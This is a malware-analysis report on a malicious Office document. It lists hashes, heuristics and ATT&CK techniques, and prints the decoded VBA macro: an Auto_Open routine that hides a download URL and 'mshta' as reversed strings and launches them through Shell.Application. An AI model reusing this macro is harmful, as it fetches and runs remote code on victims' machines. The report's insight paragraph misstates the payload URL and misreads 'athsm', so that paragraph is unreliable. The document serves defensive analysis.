Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 54515a13bdde1ab2…

MALICIOUS

Office (OOXML)

8.3 KB First seen: 2021-09-23
MD5: 853c62f2c616eab0664993b314293b8c SHA-1: 54efa33dd7d551065376b3fd331bb0e0a9466855 SHA-256: 54515a13bdde1ab2370e0475ce881a9483e10f237f6a300c466e1f3611eb61cc
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an Auto_Open subroutine that utilizes CreateObject to call ShellExecute. This macro is designed to download and execute a payload from the URL "https://diamondsvisitors.com/file.php". The script also attempts to use the string "athsm" which may be related to the downloaded payload or its execution environment.

Heuristics 5

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/HJHLjhjUYOIUJHFjfhVJHHk.bin)
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1329 bytes
SHA-256: 0db023d58e5bd02eeb0e35b7527c34119eb4ba833e79c3231b9954e1d57f17f4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"
Sub Auto_Open()
Sheet2.Outlook.ShellExecute% Sheet3.GoogleDrive, Sheet1.AdobeReaderDC
End _
Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function AdobeReaderDC()
AdobeReaderDC = (VBA.StrReverse("3pm.mifej/rb.moc.snegaivsetnamaid//:sptth"))
End Function


Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Outlook()
Set Outlook = VBA.CreateObject("Shell.Application")
End Function

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function GoogleDrive()
GoogleDrive = (VBA.StrReverse("athsm"))
End Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/HJHLjhjUYOIUJHFjfhVJHHk.bin 22528 bytes
SHA-256: df13d2e88e931958d2edde4c115b966967ce2e19a1aa174239bf200737e496b2